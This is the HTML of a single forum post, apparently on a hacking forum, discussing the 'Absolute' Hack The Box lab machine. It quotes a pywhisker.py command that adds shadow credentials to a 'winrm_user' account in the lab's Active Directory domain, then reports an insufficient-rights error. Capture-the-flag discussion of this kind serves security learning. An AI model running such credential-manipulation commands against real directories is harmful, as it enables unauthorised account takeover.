<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=542149#pid542149" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=542149#pid542149" title="RE: Absolute - HTB [Discussion]">#105</a></strong>
</div>
</div>
<span class="post_date"><span title="September 28, 2022, 05:23 AM">1 hour ago</span> <span class="post_edit" id="edited_by_542149"></span></span>
</div>
<div class="post_body scaleimages" id="pid_542149">
<blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022, 03:24 AM">3 hours ago</span>)</span>samhub123 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541589#pid541589" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite>Quote:</cite>pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"</blockquote></blockquote><br>
I also did the same thing only that in the end it gives me an error and it is the following [!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514A0,<br>
problem 4003 (INSUFF_ACCESS_RIGHTS), data 0<br>
<br/>
did you get the same error?..
				</br></br></br></div>
<div class="post_meta" id="post_meta_542149">
<div class="float_right">
</div>
</div>